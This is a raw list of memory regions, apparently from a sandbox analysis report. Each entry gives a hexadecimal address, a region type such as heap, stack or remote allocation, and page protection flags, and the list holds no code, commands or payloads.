|
stack
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
7FE89084000
|
trusted library allocation
|
page read and write
|
||
1F20000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
1B53B000
|
stack
|
page read and write
|
||
4CF1000
|
heap
|
page read and write
|
||
26CB000
|
trusted library allocation
|
page read and write
|
||
1A830000
|
heap
|
page read and write
|
||
4B75000
|
heap
|
page read and write
|
||
885E000
|
stack
|
page read and write
|
||
4F3A000
|
heap
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
529A000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
33B0000
|
remote allocation
|
page read and write
|
||
22C7000
|
trusted library allocation
|
page read and write
|
||
3D89000
|
heap
|
page read and write
|
||
1D0F000
|
direct allocation
|
page read and write
|
||
431F000
|
heap
|
page read and write
|
||
437000
|
heap
|
page read and write
|
||
124000
|
trusted library allocation
|
page read and write
|
||
1A249000
|
stack
|
page read and write
|
||
4F1A000
|
heap
|
page read and write
|
||
881F000
|
stack
|
page read and write
|
||
267D000
|
trusted library allocation
|
page read and write
|
||
3D2F000
|
heap
|
page read and write
|
||
506E000
|
stack
|
page read and write
|
||
7FE8ABD0000
|
trusted library allocation
|
page read and write
|
||
DAE000
|
stack
|
page read and write
|
||
4834000
|
heap
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
29D000
|
stack
|
page read and write
|
||
2C32000
|
trusted library allocation
|
page read and write
|
||
857000
|
heap
|
page read and write
|
||
4E4C000
|
heap
|
page read and write
|
||
5246000
|
heap
|
page read and write
|
||
3400000
|
direct allocation
|
page read and write
|
||
4320000
|
heap
|
page read and write
|
||
437D000
|
heap
|
page read and write
|
||
3447000
|
direct allocation
|
page read and write
|
||
2C2E000
|
trusted library allocation
|
page read and write
|
||
5531000
|
heap
|
page read and write
|
||
2703000
|
trusted library allocation
|
page read and write
|
||
390000
|
trusted library allocation
|
page read and write
|
||
7FE893A0000
|
trusted library allocation
|
page read and write
|
||
7FE893D0000
|
trusted library allocation
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
4D1000
|
heap
|
page read and write
|
||
500000
|
direct allocation
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
10B000
|
stack
|
page read and write
|
||
2C4A000
|
trusted library allocation
|
page read and write
|
||
5686000
|
heap
|
page read and write
|
||
4F3A000
|
heap
|
page read and write
|
||
34AE000
|
stack
|
page read and write
|
||
2689000
|
trusted library allocation
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
1C8000
|
trusted library allocation
|
page read and write
|
||
302000
|
heap
|
page read and write
|
||
131000
|
heap
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
2C5D000
|
trusted library allocation
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
4C2000
|
heap
|
page read and write
|
||
53B0000
|
heap
|
page read and write
|
||
130000
|
trusted library allocation
|
page read and write
|
||
730000
|
trusted library allocation
|
page execute and read and write
|
||
3CE9000
|
heap
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
487C000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
3DAF000
|
heap
|
page read and write
|
||
5660000
|
heap
|
page read and write
|
||
268D000
|
trusted library allocation
|
page read and write
|
||
4D0000
|
trusted library allocation
|
page execute and read and write
|
||
3EE000
|
heap
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
22D000
|
trusted library allocation
|
page execute and read and write
|
||
34B0000
|
trusted library allocation
|
page read and write
|
||
5690000
|
heap
|
page read and write
|
||
5C3000
|
heap
|
page read and write
|
||
174000
|
heap
|
page read and write
|
||
60D000
|
heap
|
page read and write
|
||
4D64000
|
heap
|
page read and write
|
||
3773000
|
trusted library allocation
|
page read and write
|
||
4369000
|
heap
|
page read and write
|
||
48F3000
|
heap
|
page read and write
|
||
2C5A000
|
trusted library allocation
|
page read and write
|
||
510000
|
trusted library allocation
|
page read and write
|
||
2781000
|
trusted library allocation
|
page read and write
|
||
31B000
|
heap
|
page read and write
|
||
4F45000
|
heap
|
page read and write
|
||
568C000
|
heap
|
page read and write
|
||
35C000
|
heap
|
page read and write
|
||
21DC000
|
stack
|
page read and write
|
||
4D38000
|
heap
|
page read and write
|
||
7E9E000
|
stack
|
page read and write
|
||
4F0E000
|
heap
|
page read and write
|
||
4316000
|
heap
|
page read and write
|
||
1C4D6000
|
heap
|
page read and write
|
||
3D9E000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
5688000
|
heap
|
page read and write
|
||
25AB000
|
trusted library allocation
|
page read and write
|
||
2797000
|
trusted library allocation
|
page read and write
|
||
29E000
|
heap
|
page read and write
|
||
23C000
|
stack
|
page read and write
|
||
4D70000
|
heap
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
377E000
|
trusted library allocation
|
page read and write
|
||
D7000
|
heap
|
page read and write
|
||
2F8000
|
heap
|
page read and write
|
||
1C496000
|
heap
|
page read and write
|
||
2775000
|
trusted library allocation
|
page read and write
|
||
C1E000
|
stack
|
page read and write | page guard
|
||
1A7A4000
|
heap
|
page read and write
|
||
49B000
|
remote allocation
|
page execute and read and write
|
||
26C3000
|
trusted library allocation
|
page read and write
|
||
5A3F000
|
stack
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
3DAE000
|
heap
|
page read and write
|
||
1CC5E000
|
stack
|
page read and write
|
||
7FE89350000
|
trusted library allocation
|
page read and write
|
||
1A30C000
|
stack
|
page read and write
|
||
3D9E000
|
heap
|
page read and write
|
||
2184000
|
heap
|
page read and write
|
||
1C70E000
|
stack
|
page read and write
|
||
3420000
|
direct allocation
|
page read and write
|
||
130000
|
heap
|
page read and write
|
||
2715000
|
trusted library allocation
|
page read and write
|
||
3DF000
|
heap
|
page read and write
|
||
2EE000
|
heap
|
page read and write
|
||
1A83C000
|
heap
|
page read and write
|
||
510F000
|
stack
|
page read and write
|
||
16A000
|
stack
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
3D8000
|
stack
|
page read and write
|
||
7FE892A0000
|
trusted library allocation
|
page read and write
|
||
51A0000
|
heap
|
page read and write
|
||
540000
|
trusted library section
|
page read and write
|
||
33E0000
|
direct allocation
|
page read and write
|
||
7FE8AB90000
|
trusted library allocation
|
page read and write
|
||
7FE8A93D000
|
trusted library allocation
|
page execute and read and write
|
||
48F9000
|
heap
|
page read and write
|
||
439D000
|
heap
|
page read and write
|
||
10E0000
|
unkown
|
page readonly
|
||
39A000
|
heap
|
page read and write
|
||
7FE89270000
|
trusted library allocation
|
page execute and read and write
|
||
21B000
|
stack
|
page read and write
|
||
4ED7000
|
heap
|
page read and write
|
||
4B87000
|
heap
|
page read and write
|
||
2180000
|
heap
|
page read and write
|
||
25C000
|
stack
|
page read and write
|
||
224000
|
trusted library allocation
|
page read and write
|
||
A9E000
|
stack
|
page read and write
|
||
50B0000
|
heap
|
page read and write
|
||
494000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
437D000
|
heap
|
page read and write
|
||
3D5C000
|
heap
|
page read and write
|
||
4E5B000
|
heap
|
page read and write
|
||
47C1000
|
heap
|
page read and write
|
||
7FE8908D000
|
trusted library allocation
|
page execute and read and write
|
||
52AD000
|
heap
|
page read and write
|
||
4E6A000
|
heap
|
page read and write
|
||
1CDCF000
|
stack
|
page read and write
|
||
5688000
|
heap
|
page read and write
|
||
7CE000
|
stack
|
page read and write
|
||
DF0000
|
heap
|
page execute and read and write
|
||
437D000
|
heap
|
page read and write
|
||
380000
|
trusted library allocation
|
page execute and read and write
|
||
52AD000
|
heap
|
page read and write
|
||
385000
|
heap
|
page read and write
|
||
45A5000
|
heap
|
page read and write
|
||
48F5000
|
heap
|
page read and write
|
||
2C4E000
|
trusted library allocation
|
page read and write
|
||
1B90000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
3453000
|
direct allocation
|
page read and write
|
||
4F43000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
4759000
|
heap
|
page read and write
|
||
121B1000
|
trusted library allocation
|
page read and write
|
||
53ED000
|
heap
|
page read and write
|
||
2681000
|
trusted library allocation
|
page read and write
|
||
35C000
|
heap
|
page read and write
|
||
464000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
87EF000
|
stack
|
page read and write
|
||
4040000
|
trusted library allocation
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
339000
|
heap
|
page read and write
|
||
52A4000
|
heap
|
page read and write
|
||
240000
|
heap
|
page read and write
|
||
1B43B000
|
heap
|
page read and write
|
||
264A000
|
trusted library allocation
|
page read and write
|
||
3D99000
|
heap
|
page read and write
|
||
6BE000
|
stack
|
page read and write
|
||
27AB000
|
trusted library allocation
|
page read and write
|
||
36D000
|
heap
|
page read and write
|
||
7FE892C0000
|
trusted library allocation
|
page read and write
|
||
150000
|
trusted library allocation
|
page read and write
|
||
3543000
|
trusted library allocation
|
page read and write
|
||
4F03000
|
heap
|
page read and write
|
||
1C47F000
|
stack
|
page read and write
|
||
4ED5000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
62F000
|
heap
|
page read and write
|
||
4360000
|
heap
|
page read and write
|
||
7FE89340000
|
trusted library allocation
|
page read and write
|
||
365000
|
heap
|
page read and write
|
||
1D30000
|
heap
|
page read and write
|
||
424000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
52AD000
|
heap
|
page read and write
|
||
2100000
|
heap
|
page execute and read and write
|
||
1C215000
|
heap
|
page read and write
|
||
267B000
|
trusted library allocation
|
page read and write
|
||
5739000
|
heap
|
page read and write
|
||
5581000
|
heap
|
page read and write
|
||
2757000
|
trusted library allocation
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
D4000
|
heap
|
page read and write
|
||
279000
|
heap
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
1B394000
|
heap
|
page read and write
|
||
23A0000
|
heap
|
page read and write
|
||
7F7D000
|
stack
|
page read and write
|
||
26C2000
|
trusted library allocation
|
page read and write
|
||
5230000
|
trusted library allocation
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
4F25000
|
heap
|
page read and write
|
||
2C25000
|
trusted library allocation
|
page read and write
|
||
2440000
|
heap
|
page read and write
|
||
2777000
|
trusted library allocation
|
page read and write
|
||
730000
|
trusted library allocation
|
page execute and read and write
|
||
35C000
|
heap
|
page read and write
|
||
4DDC000
|
heap
|
page read and write
|
||
4F03000
|
heap
|
page read and write
|
||
2683000
|
trusted library allocation
|
page read and write
|
||
2EA000
|
heap
|
page read and write
|
||
1A7B9000
|
stack
|
page read and write
|
||
874000
|
heap
|
page read and write
|
||
EC2000
|
unkown
|
page execute read
|
||
38D000
|
heap
|
page read and write
|
||
5768000
|
heap
|
page read and write
|
||
269D000
|
trusted library allocation
|
page read and write
|
||
380000
|
heap
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
F54000
|
unkown
|
page readonly
|
||
10000
|
heap
|
page read and write
|
||
4F05000
|
heap
|
page read and write
|
||
803F000
|
stack
|
page read and write
|
||
34D9000
|
trusted library allocation
|
page read and write
|
||
4F43000
|
heap
|
page read and write
|
||
2697000
|
trusted library allocation
|
page read and write
|
||
5337000
|
heap
|
page read and write
|
||
357000
|
trusted library allocation
|
page execute and read and write
|
||
1C4CE000
|
heap
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
4B9000
|
heap
|
page read and write
|
||
861E000
|
stack
|
page read and write
|
||
277D000
|
trusted library allocation
|
page read and write
|
||
1B0000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
34F5000
|
trusted library allocation
|
page read and write
|
||
2A0000
|
stack
|
page read and write
|
||
4E9E000
|
heap
|
page read and write
|
||
622000
|
heap
|
page read and write
|
||
483000
|
direct allocation
|
page read and write
|
||
4F45000
|
heap
|
page read and write
|
||
3C0000
|
trusted library allocation
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
1C210000
|
heap
|
page read and write
|
||
1D1F000
|
stack
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
4D73000
|
heap
|
page read and write
|
||
52A8000
|
heap
|
page read and write
|
||
3CED000
|
heap
|
page read and write
|
||
26B1000
|
trusted library allocation
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
371F000
|
stack
|
page read and write
|
||
2B10000
|
remote allocation
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
10F0000
|
unkown
|
page readonly
|
||
12D000
|
trusted library allocation
|
page execute and read and write
|
||
3D37000
|
heap
|
page read and write
|
||
271D000
|
trusted library allocation
|
page read and write
|
||
31F000
|
stack
|
page read and write
|
||
4ECD000
|
heap
|
page read and write
|
||
2C23000
|
trusted library allocation
|
page read and write
|
||
2A8000
|
stack
|
page read and write
|
||
3770000
|
trusted library allocation
|
page read and write
|
||
5764000
|
heap
|
page read and write
|
||
363000
|
heap
|
page read and write
|
||
2C4E000
|
trusted library allocation
|
page read and write
|
||
310000
|
heap
|
page read and write
|
||
2739000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
223000
|
trusted library allocation
|
page execute and read and write
|
||
12271000
|
trusted library allocation
|
page read and write
|
||
55B8000
|
heap
|
page read and write
|
||
1B05C000
|
heap
|
page read and write
|
||
2677000
|
trusted library allocation
|
page read and write
|
||
1D80000
|
trusted library allocation
|
page read and write
|
||
8B0000
|
heap
|
page read and write
|
||
4E1D000
|
heap
|
page read and write
|
||
329000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
37A0000
|
trusted library allocation
|
page read and write
|
||
323000
|
heap
|
page read and write
|
||
26E1000
|
trusted library allocation
|
page read and write
|
||
1A7E7000
|
heap
|
page read and write
|
||
3D8A000
|
heap
|
page read and write
|
||
4A50000
|
heap
|
page read and write
|
||
39D000
|
heap
|
page read and write
|
||
399000
|
stack
|
page read and write
|
||
1E86000
|
heap
|
page read and write
|
||
543D000
|
stack
|
page read and write
|
||
5768000
|
heap
|
page read and write
|
||
282000
|
stack
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
2B8000
|
heap
|
page read and write
|
||
1B405000
|
heap
|
page read and write
|
||
64B000
|
heap
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
1C4E6000
|
heap
|
page read and write
|
||
3D20000
|
heap
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
594F000
|
stack
|
page read and write
|
||
2C4F000
|
trusted library allocation
|
page read and write
|
||
431E000
|
heap
|
page read and write
|
||
3D8C000
|
heap
|
page read and write
|
||
1172000
|
unkown
|
page execute read
|
||
52C0000
|
heap
|
page read and write
|
||
276B000
|
trusted library allocation
|
page read and write
|
||
2C5D000
|
trusted library allocation
|
page read and write
|
||
23F000
|
heap
|
page read and write
|
||
1A31C000
|
stack
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
229C000
|
stack
|
page read and write
|
||
4F1C000
|
heap
|
page read and write
|
||
2C35000
|
trusted library allocation
|
page read and write
|
||
2C4A000
|
trusted library allocation
|
page read and write
|
||
82AF000
|
stack
|
page read and write
|
||
1F04000
|
heap
|
page read and write
|
||
4D71000
|
heap
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
49A000
|
heap
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
372F000
|
trusted library allocation
|
page read and write
|
||
7FE89082000
|
trusted library allocation
|
page read and write
|
||
7FE8AB60000
|
trusted library allocation
|
page read and write
|
||
1B2E0000
|
heap
|
page read and write
|
||
278B000
|
trusted library allocation
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
26AD000
|
trusted library allocation
|
page read and write
|
||
3D95000
|
heap
|
page read and write
|
||
26B9000
|
trusted library allocation
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
4F47000
|
heap
|
page read and write
|
||
4E3D000
|
heap
|
page read and write
|
||
7FE89136000
|
trusted library allocation
|
page read and write
|
||
4834000
|
heap
|
page read and write
|
||
7FE8909B000
|
trusted library allocation
|
page read and write
|
||
5A7000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
35B000
|
trusted library allocation
|
page execute and read and write
|
||
38A000
|
heap
|
page read and write
|
||
360C000
|
stack
|
page read and write
|
||
2C2B000
|
trusted library allocation
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
1A8D8000
|
stack
|
page read and write
|
||
3D95000
|
heap
|
page read and write
|
||
839E000
|
stack
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
53CE000
|
stack
|
page read and write
|
||
2A60000
|
heap
|
page read and write
|
||
2719000
|
trusted library allocation
|
page read and write
|
||
7FE89166000
|
trusted library allocation
|
page execute and read and write
|
||
1A67A000
|
stack
|
page read and write
|
||
240000
|
heap
|
page read and write
|
||
4E6A000
|
heap
|
page read and write
|
||
2731000
|
trusted library allocation
|
page read and write
|
||
47C1000
|
heap
|
page read and write
|
||
48FD000
|
heap
|
page read and write
|
||
4F45000
|
heap
|
page read and write
|
||
278F000
|
trusted library allocation
|
page read and write
|
||
5F5000
|
heap
|
page read and write
|
||
404000
|
heap
|
page read and write
|
||
568C000
|
heap
|
page read and write
|
||
3DAA000
|
heap
|
page read and write
|
||
7FE89290000
|
trusted library allocation
|
page read and write
|
||
1F50000
|
direct allocation
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
4F3E000
|
heap
|
page read and write
|
||
5EE000
|
unkown
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
2450000
|
heap
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
535000
|
heap
|
page read and write
|
||
69E000
|
heap
|
page read and write
|
||
4D8A000
|
heap
|
page read and write
|
||
274B000
|
trusted library allocation
|
page read and write
|
||
2773000
|
trusted library allocation
|
page read and write
|
||
4DD6000
|
heap
|
page read and write
|
||
47C1000
|
heap
|
page read and write
|
||
7FE8ABF0000
|
trusted library allocation
|
page read and write
|
||
272B000
|
trusted library allocation
|
page read and write
|
||
56E0000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
3E9000
|
heap
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
157000
|
trusted library allocation
|
page execute and read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
34CC000
|
stack
|
page read and write
|
||
F2F000
|
stack
|
page read and write
|
||
1D44000
|
heap
|
page read and write
|
||
4EDC000
|
heap
|
page read and write
|
||
4B75000
|
heap
|
page read and write
|
||
36C1000
|
trusted library allocation
|
page read and write
|
||
21D9000
|
trusted library allocation
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4E6A000
|
heap
|
page read and write
|
||
120000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
D4D000
|
stack
|
page read and write
|
||
203000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2691000
|
trusted library allocation
|
page read and write
|
||
4EFB000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
17F000
|
trusted library allocation
|
page read and write
|
||
3CE8000
|
heap
|
page read and write
|
||
5734000
|
heap
|
page read and write
|
||
2C5D000
|
trusted library allocation
|
page read and write
|
||
4F0E000
|
heap
|
page read and write
|
||
4F48000
|
heap
|
page read and write
|
||
2C48000
|
trusted library allocation
|
page read and write
|
||
26E3000
|
trusted library allocation
|
page read and write
|
||
307000
|
heap
|
page read and write
|
||
4ED5000
|
heap
|
page read and write
|
||
520000
|
direct allocation
|
page read and write
|
||
1F77000
|
direct allocation
|
page read and write
|
||
390000
|
heap
|
page read and write
|
||
310000
|
heap
|
page read and write
|
||
1C24000
|
heap
|
page read and write
|
||
5772000
|
heap
|
page read and write
|
||
26D3000
|
trusted library allocation
|
page read and write
|
||
2F5F000
|
stack
|
page read and write
|
||
3D42000
|
heap
|
page read and write
|
||
5C4000
|
heap
|
page read and write
|
||
4BDF000
|
heap
|
page read and write
|
||
77C000
|
stack
|
page read and write
|
||
63D000
|
heap
|
page read and write
|
||
1C24B000
|
heap
|
page read and write
|
||
3A6000
|
heap
|
page read and write
|
||
3591000
|
trusted library allocation
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
592E000
|
stack
|
page read and write
|
||
2749000
|
trusted library allocation
|
page read and write
|
||
3B0000
|
trusted library allocation
|
page read and write
|
||
4E0000
|
direct allocation
|
page read and write
|
||
3CAC000
|
stack
|
page read and write
|
||
83CF000
|
stack
|
page read and write
|
||
52A4000
|
heap
|
page read and write
|
||
5292000
|
heap
|
page read and write
|
||
42AD000
|
heap
|
page read and write
|
||
4369000
|
heap
|
page read and write
|
||
598000
|
trusted library allocation
|
page read and write
|
||
637000
|
heap
|
page read and write
|
||
2C5A000
|
trusted library allocation
|
page read and write
|
||
1C298000
|
heap
|
page read and write
|
||
177000
|
trusted library allocation
|
page read and write
|
||
572E000
|
heap
|
page read and write
|
||
7FE8AA50000
|
trusted library allocation
|
page execute and read and write
|
||
578D000
|
heap
|
page read and write
|
||
140000
|
stack
|
page read and write
|
||
1CF7000
|
direct allocation
|
page read and write
|
||
2F40000
|
heap
|
page read and write
|
||
1B16E000
|
stack
|
page read and write
|
||
122A1000
|
trusted library allocation
|
page read and write
|
||
3E6000
|
heap
|
page read and write
|
||
1DD0000
|
heap
|
page read and write
|
||
749000
|
heap
|
page read and write
|
||
4A0000
|
remote allocation
|
page execute and read and write
|
||
1CE000
|
stack
|
page read and write
|
||
4369000
|
heap
|
page read and write
|
||
7FE8A940000
|
trusted library allocation
|
page read and write
|
||
242C000
|
trusted library allocation
|
page read and write
|
||
52A8000
|
heap
|
page read and write
|
||
48F7000
|
heap
|
page read and write
|
||
1D40000
|
heap
|
page read and write
|
||
4DF6000
|
heap
|
page read and write
|
||
1C600000
|
heap
|
page read and write
|
||
2C6000
|
heap
|
page read and write
|
||
48FD000
|
heap
|
page read and write
|
||
1D70000
|
direct allocation
|
page read and write
|
||
4DAF000
|
heap
|
page read and write
|
||
568C000
|
heap
|
page read and write
|
||
1E0000
|
trusted library allocation
|
page read and write
|
||
30D000
|
heap
|
page read and write
|
||
1CA6E000
|
stack
|
page read and write
|
||
25AD000
|
trusted library allocation
|
page read and write
|
||
21F0000
|
heap
|
page execute and read and write
|
||
2BFB000
|
heap
|
page read and write
|
||
38F000
|
heap
|
page read and write
|
||
1EF000
|
trusted library allocation
|
page read and write
|
||
2C5D000
|
trusted library allocation
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
4880000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
7FE8ABA0000
|
trusted library allocation
|
page read and write
|
||
4C2000
|
heap
|
page read and write
|
||
2D7E000
|
stack
|
page read and write
|
||
30D0000
|
trusted library allocation
|
page read and write
|
||
D0000
|
heap
|
page read and write
|
||
2C2A000
|
trusted library allocation
|
page read and write
|
||
7FE89390000
|
trusted library allocation
|
page read and write
|
||
812E000
|
stack
|
page read and write
|
||
2771000
|
trusted library allocation
|
page read and write
|
||
1EDF000
|
stack
|
page read and write
|
||
4DC1000
|
heap
|
page read and write
|
||
575F000
|
heap
|
page read and write
|
||
2C26000
|
trusted library allocation
|
page read and write
|
||
4F05000
|
heap
|
page read and write
|
||
1B230000
|
heap
|
page read and write
|
||
4040000
|
trusted library allocation
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
84AD000
|
stack
|
page read and write
|
||
1A688000
|
heap
|
page execute and read and write
|
||
D0000
|
heap
|
page read and write
|
||
714000
|
heap
|
page read and write
|
||
83AE000
|
stack
|
page read and write
|
||
1D10000
|
direct allocation
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
3BE000
|
heap
|
page read and write
|
||
4DBC000
|
heap
|
page read and write
|
||
576A000
|
heap
|
page read and write
|
||
7FE89240000
|
trusted library allocation
|
page execute and read and write
|
||
1C4EE000
|
heap
|
page read and write
|
||
4314000
|
heap
|
page read and write
|
||
329000
|
stack
|
page read and write
|
||
3D5A000
|
heap
|
page read and write
|
||
7FE89320000
|
trusted library allocation
|
page read and write
|
||
2729000
|
trusted library allocation
|
page read and write
|
||
2181000
|
trusted library allocation
|
page read and write
|
||
1C4A2000
|
heap
|
page read and write
|
||
1D66000
|
heap
|
page read and write
|
||
20D0000
|
heap
|
page execute and read and write
|
||
7FE8AC10000
|
trusted library allocation
|
page read and write
|
||
48F7000
|
heap
|
page read and write
|
||
4F3E000
|
heap
|
page read and write
|
||
42FF000
|
heap
|
page read and write
|
||
4BB6000
|
heap
|
page read and write
|
||
797000
|
heap
|
page read and write
|
||
5650000
|
heap
|
page read and write
|
||
573E000
|
heap
|
page read and write
|
||
DE0000
|
heap
|
page execute and read and write
|
||
327000
|
heap
|
page read and write
|
||
110000
|
trusted library allocation
|
page read and write
|
||
5336000
|
heap
|
page read and write
|
||
26CD000
|
trusted library allocation
|
page read and write
|
||
385000
|
heap
|
page read and write
|
||
4C2000
|
heap
|
page read and write
|
||
4376000
|
heap
|
page read and write
|
||
7FE89370000
|
trusted library allocation
|
page read and write
|
||
35ED000
|
trusted library allocation
|
page read and write
|
||
272D000
|
trusted library allocation
|
page read and write
|
||
3DE000
|
heap
|
page read and write
|
||
5270000
|
heap
|
page read and write
|
||
279000
|
heap
|
page read and write
|
||
38AB000
|
stack
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
293F000
|
stack
|
page read and write
|
||
AB0000
|
trusted library allocation
|
page read and write
|
||
1B390000
|
heap
|
page read and write
|
||
5271000
|
heap
|
page read and write
|
||
3AB000
|
heap
|
page read and write
|
||
279F000
|
trusted library allocation
|
page read and write
|
||
35C000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
575C000
|
heap
|
page read and write
|
||
4F05000
|
heap
|
page read and write
|
||
52AD000
|
heap
|
page read and write
|
||
324000
|
heap
|
page read and write
|
||
26BF000
|
trusted library allocation
|
page read and write
|
||
52B1000
|
heap
|
page read and write
|
||
4DAD000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
5EF000
|
heap
|
page read and write
|
||
4E6A000
|
heap
|
page read and write
|
||
363000
|
heap
|
page read and write
|
||
440000
|
direct allocation
|
page read and write
|
||
2759000
|
trusted library allocation
|
page read and write
|
||
3DE000
|
heap
|
page read and write
|
||
26EB000
|
trusted library allocation
|
page read and write
|
||
320000
|
heap
|
page read and write
|
||
45A0000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
35F000
|
heap
|
page read and write
|
||
20DE000
|
unkown
|
page read and write
|
||
2C32000
|
trusted library allocation
|
page read and write
|
||
3759000
|
trusted library allocation
|
page read and write
|
||
3DA0000
|
heap
|
page read and write
|
||
52A4000
|
heap
|
page read and write
|
||
3DB000
|
heap
|
page read and write
|
||
432F000
|
heap
|
page read and write
|
||
4F1A000
|
heap
|
page read and write
|
||
4DF9000
|
heap
|
page read and write
|
||
1AF7E000
|
heap
|
page read and write
|
||
26C1000
|
trusted library allocation
|
page read and write
|
||
7FE89140000
|
trusted library allocation
|
page execute and read and write
|
||
3F80000
|
heap
|
page read and write
|
||
33B0000
|
remote allocation
|
page read and write
|
||
E30000
|
trusted library allocation
|
page execute and read and write
|
||
529E000
|
stack
|
page read and write
|
||
26B7000
|
trusted library allocation
|
page read and write
|
||
3CDF000
|
heap
|
page read and write
|
||
4F47000
|
heap
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
47C1000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
352000
|
trusted library allocation
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
DC000
|
stack
|
page read and write
|
||
2705000
|
trusted library allocation
|
page read and write
|
||
2C53000
|
trusted library allocation
|
page read and write
|
||
346000
|
heap
|
page read and write
|
||
7FE8AB40000
|
trusted library allocation
|
page read and write
|
||
3CBC000
|
heap
|
page read and write
|
||
152000
|
trusted library allocation
|
page read and write
|
||
4F03000
|
heap
|
page read and write
|
||
85AF000
|
stack
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
4ED7000
|
heap
|
page read and write
|
||
7FE8A94B000
|
trusted library allocation
|
page read and write
|
||
500000
|
trusted library allocation
|
page read and write
|
||
FD0000
|
heap
|
page execute and read and write
|
||
49B000
|
direct allocation
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
4F43000
|
heap
|
page read and write
|
||
3CED000
|
heap
|
page read and write
|
||
5539000
|
heap
|
page read and write
|
||
1A820000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
1C595000
|
heap
|
page read and write
|
||
4DD4000
|
heap
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
4D2000
|
heap
|
page read and write
|
||
275D000
|
trusted library allocation
|
page read and write
|
||
5734000
|
heap
|
page read and write
|
||
9E000
|
heap
|
page read and write
|
||
1C2C5000
|
heap
|
page read and write
|
||
432C000
|
heap
|
page read and write
|
||
3CB0000
|
heap
|
page read and write
|
||
41F0000
|
heap
|
page read and write
|
||
3D87000
|
heap
|
page read and write
|
||
568C000
|
heap
|
page read and write
|
||
362000
|
heap
|
